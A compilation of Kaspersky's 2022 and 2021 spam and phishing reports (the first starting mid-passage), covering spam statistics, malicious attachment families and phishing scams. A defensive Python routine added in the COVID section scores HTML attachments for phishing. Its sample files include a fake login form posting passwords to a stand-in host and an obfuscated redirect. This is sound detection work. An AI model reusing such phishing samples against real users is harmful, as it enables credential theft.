We have identified targets of this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

## Statistics: spam

### Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021.
Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest month: only 45.20% of emails were spam.

In Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend of a gradual shift in the ratio in favor of legitimate correspondence can also be seen here. We saw the largest share of spam in Runet in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. The quietest month in Runet was December (47.18%), the same as globally.

### Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points.
Third place is still held by the United States (10.71%).

_TOP 20 countries and territories — sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_

The Netherlands remained in fifth place (3.70%), although its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%), and India (1.82%).

### Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments, an increase of 18 million from the previous year. This component was triggered most often in March, May, and June 2022.

_Number of Mail Anti-Virus hits, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_

The most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%), which spread as archived electronic documents, moved down to third place. The fourth most common malware were exploits for [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%), a vulnerability in Microsoft Equation Editor. In 2022, attackers used them significantly more often than exploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (1.80%) in the same component.
CVE-2017-11882 was more widespread in 2021 and has now dropped to tenth place.

_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_

[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement took it down in early 2021, but by the fall attackers had rebuilt the infrastructure, and they distributed it actively throughout 2022. More recently, Emotet has been used to deliver other malware, ransomware in particular, to victims' devices. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the Windows Task Scheduler.

_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

### Countries and territories targeted by malicious mailings

Spain remained the leader in blocked malicious attachments in 2022 (8.78%), a slight decrease from 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%) and fourth to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The share of Mail Anti-Virus detections on computers of users in Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained tenth.

## Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

### Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices in Vietnam (17.03%), a country absent from the 2021 TOP 10 of most attacked countries and territories. Macau is second (13.88%), also absent from last year's ranking. Madagascar, seventh in 2021, is third (12.04%). Besides Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) are new at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

**Country/territory** | **Share of attacked users***
---|---
Vietnam | 17.03%
Macau | 13.88%
Madagascar | 12.04%
Algeria | 11.05%
Ecuador | 11.05%
Malawi | 10.91%
Brunei | 10.59%
Brazil | 10.57%
Morocco | 10.43%
Portugal | 10.33%

**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**

### Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone remained in second place (8.79%), its share also decreasing. The third most popular zone among attackers was FUN (7.85%), which had not previously attracted their attention; the zone is associated with entertainment content, which may be what drew fraudsters to it.

_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_

ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth place. The rest of the ten zones in most demand among cybercriminals were RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

### Organizations under phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

In 2022, pages impersonating delivery services accounted for the highest share of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), popular with attackers during the pandemic, took second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round out the TOP 10 categories of sites of interest to criminals.

### Hijacking Telegram accounts

In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. By the end of the year, however, the number of phishing attacks on the messenger's users rose dramatically: 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).

_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_

Notably, the majority of these phishing attacks targeted users in Russia. In the first months of 2022 their share was roughly half of all attacks worldwide; from March onwards, 70–90% of all attempts by Telegram users to follow such phishing links came from Russian users.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2022, our mobile solution blocked 360,185 attempts to click phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and 3.17% from Viber.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_

Phishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent; by the third quarter, phishing activity in the messenger had dropped sharply.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)

**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is second: over the year, the Safe Messaging component prevented 69,000 attempts to go to fraudulent resources from the messenger there.

_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_

Unlike WhatsApp, Telegram saw the number of phishing attacks almost triple in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. Activity peaked at the end of June and beginning of July, when the number of blocked clicks exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)

**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, with 3,800 blocked clicks.

_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_

## Conclusion

Times of crisis create the preconditions for crime to flourish, online included. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and the departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021 but already waning in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we've seen an increase in targeted phishing attacks in which scammers do not launch the phishing attack itself immediately, but only after several introductory emails of active correspondence with the victim. This trend is likely to continue.
New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.

_Source: Kaspersky Securelist, "Spam and phishing in 2022", published 2023-02-16, <https://securelist.com/spam-phishing-scam-report-2022/108692/>. CVEs referenced: CVE-2017-11882, CVE-2018-0802._

_The report below covers 2021 (record last seen 2022-02-14)._

## Figures of the year

In 2021:

 * 45.56% of e-mails were spam
 * 24.77% of spam was sent from Russia, with another 14.12% from Germany
 * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
 * The most common malware family found in attachments were Agensla Trojans
 * Our Anti-Phishing system blocked 253 365 212 phishing links
 * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers

## Trends of the year

### How to make an unprofitable investment with no return

The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they would invite the "customer" to a consultation with a specialist in order to come across as legitimate. The outcome was always the same: the investor received nothing in return for giving their money to the scammers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)

Similar schemes targeting English speakers were also deployed intensively online. Scammers encouraged investment both in abstract securities and in more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)

Another trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk for the investor, as well as the status of the company they were posing as.
To keep investors from thinking the process sounded too good to be true, victims were invited to take an online test or fill out an application form that would ostensibly take some time to be "processed".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)

### Films and events "streamed" on fake sites: not seeing is believing!

Online streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date and continued to pop up until the eve of the official premiere. Scammers used various ploys to win the victim's trust, such as placing official advertisements and a synopsis of the film on the website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)

However, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have nothing at all to do with the film used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content; the only difference was that visitors might not be able to watch anything at all without registering. Either way, the registration was not free. The registration fee was only a symbolic figure according to the website, but any amount of money could be debited once the user had entered their bank card details, which immediately fell into the hands of the attackers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)

### A special offer from cybercriminals: try your hand at spamming

More and more often, scam websites posing as large companies and promising huge cash prizes for completing a survey have begun setting stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive the prize. So the person who completes the full task not only gives the scammers money, but also recommends the scam to the people in their contact list. Meanwhile, those friends see the ad coming from someone they know rather than from an unknown number, which can give them a false sense of security, encouraging them to follow the link and part with their money in turn.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)

### Hurry up and lose your account: phishing in the corporate sector

The main objective of scammers attacking an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or as notifications about work documents requiring the recipient's attention. The attackers' aim was to trick the victim into following the link to a phishing page and entering login details, so these e-mails would contain a link to a document, file, payment request, etc., on which some sort of urgent action supposedly needed to be taken.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)

The fake notification would often concern undelivered messages, which needed to be accessed via some sort of "email Portal" or similar resource.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)

Another noticeable phishing trend targeting the corporate sector was the use of popular cloud services as bait. Fake notifications about meetings in Microsoft Teams, or a message about important documents sent via SharePoint for salary payment approval, were meant to lower the recipient's guard and prompt them to enter the username and password for their corporate account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)

### COVID-19

#### Scams

The subject of COVID-19, which dominated newsfeeds throughout the year, was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to pandemic restrictions, as this issue remained top of the agenda. The e-mails referenced laws, specific measures and the names of government organizations to sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving the requested commission along with the victim's bank card details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)

The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous on two counts: in some countries the buyer risks criminal charges, and the scammers can easily cheat the customer, since there is no guarantee that the code they sell will work. A further risk is that the buyer has to reveal sensitive personal information to the dealer peddling the certificates in order to complete the transaction.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)

#### The corporate sector

COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives of these mailings was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various COVID-19-related ploys. In particular, we detected notifications about compensation allocated by the government to employees of certain companies; all the recipient needed to do to receive this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)

Another malicious mailshot used e-mails with an attached HTML file called "Covid Test Result". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)

The "important message about vaccination" supposedly lying unread in the recipient's inbox also contained a link to an attacker-controlled page requesting corporate account details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)

Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt", was intended to make the recipient open the attachment containing the malicious object as quickly as possible.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)

#### COVID-19 vaccination

While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service, inviting the recipient to be vaccinated after first confirming their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)

In both cases, a form had to be filled out with personal data to make a vaccination appointment, and in the former case the phishers also asked for bank card details.
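The "Covid Test Result" HTML attachment above, and the fake data-collection forms in this section generally, share a structure that a gateway can test for without knowing the lure: a local HTML file that either embeds a credential form posting to a host outside the organization, bounces the reader to such a host (meta refresh or a JavaScript `location` write), or decodes its real payload on load (`atob`, `unescape`). The triage routine below is an added example written for this page, not Kaspersky's detection logic. The trusted domain `corp.example.org`, the attacker hosts `login-check.example.net` and `docs-share.example.net`, the indicator labels and the block threshold are all this example's own assumptions; the three sample files are constructed.

```python
"""Triage an HTML mail attachment for credential-phishing behaviour.

Added example (not Kaspersky code). Indicators are structural, so they hold for
any lure text: password field, form posting outside the trusted domain,
redirect outside the trusted domain, decode-on-load obfuscation.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# window.location = "...", document.location.href = "...", location.replace("...")
REDIRECT_JS = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href|\.replace)?\s*[=(]\s*['\"]([^'\"]+)",
    re.I)
OBFUSCATION = re.compile(r"\b(?:atob|unescape|eval|String\.fromCharCode)\s*\(", re.I)
META_REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.I)


class _Collector(HTMLParser):
    """Collect forms, password inputs, meta refreshes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.meta_redirects, self.scripts = [], [], []
        self.password_fields = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                      # attribute names arrive lower-cased
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH_URL.search(a.get("content") or "")
            if m:
                self.meta_redirects.append(m.group(1))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:                  # html.parser hands <script> bodies here
            self.scripts.append(data)


def _external(url: str, trusted: str) -> bool:
    """True for an absolute URL whose host is not the trusted domain or a subdomain.
    Relative targets (hostname None) are not treated as external."""
    host = urlsplit(url).hostname
    return bool(host) and host != trusted and not host.endswith("." + trusted)


def assess_html_attachment(html: str, trusted_domain: str):
    """Return (score, indicators). A score of 2 or more is the block threshold
    assumed here: one structural oddity is common in legitimate saved pages,
    two together almost never are."""
    c = _Collector()
    c.feed(html)
    indicators = []
    if c.password_fields:
        indicators.append("password-field")
    for action in c.form_actions:
        if _external(action, trusted_domain):
            indicators.append("form-posts-external:" + urlsplit(action).hostname)
    js_targets = [m.group(1) for s in c.scripts for m in REDIRECT_JS.finditer(s)]
    for target in c.meta_redirects + js_targets:
        if _external(target, trusted_domain):
            indicators.append("redirects-external:" + urlsplit(target).hostname)
    if any(OBFUSCATION.search(s) for s in c.scripts):
        indicators.append("decode-on-load")
    return len(indicators), indicators


# Constructed sample attachments (hostnames are placeholders, not real phishing sites).
_B64_TARGET = base64.b64encode(b"https://docs-share.example.net/view").decode()
SAMPLES = {
    "Covid Test Result.html": (
        '<html><body><h2>Covid Test Result</h2>'
        '<p>Sign in with your work account to view the document.</p>'
        '<form method="post" action="https://login-check.example.net/owa/auth.php">'
        '<input type="email" name="login"><input type="password" name="passwd">'
        '<button>Sign in</button></form></body></html>'),
    "document.html": (
        '<html><head>'
        '<meta http-equiv="refresh" content="0; url=https://docs-share.example.net/view">'
        '<script>setTimeout(function(){ document.location = atob("' + _B64_TARGET +
        '"); }, 100);</script></head><body>Loading your document...</body></html>'),
    "result.html": (
        '<html><body><h2>Covid Test Result</h2><p>Result: negative.</p>'
        '<p>Questions? See <a href="https://health.corp.example.org/faq">the FAQ</a>.</p>'
        '</body></html>'),
}

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        score, why = assess_html_attachment(html, "corp.example.org")
        print(f"{name:24s} score={score} {why}")
```

The point of scoring rather than blocking on any single indicator is the false-positive profile: an HTML file saved from an intranet page may legitimately contain a password field (relative form action, score 1), while a file that both carries a password form and posts it to a host outside the organization, or that immediately bounces the reader elsewhere and decodes its target at run time, has no benign reading. Obfuscation that hides the whole document (a single `document.write(unescape(...))`) still trips the decode-on-load check even though no redirect URL is visible in clear text.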
If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. 
The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who've also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. 
In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. 
Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. 
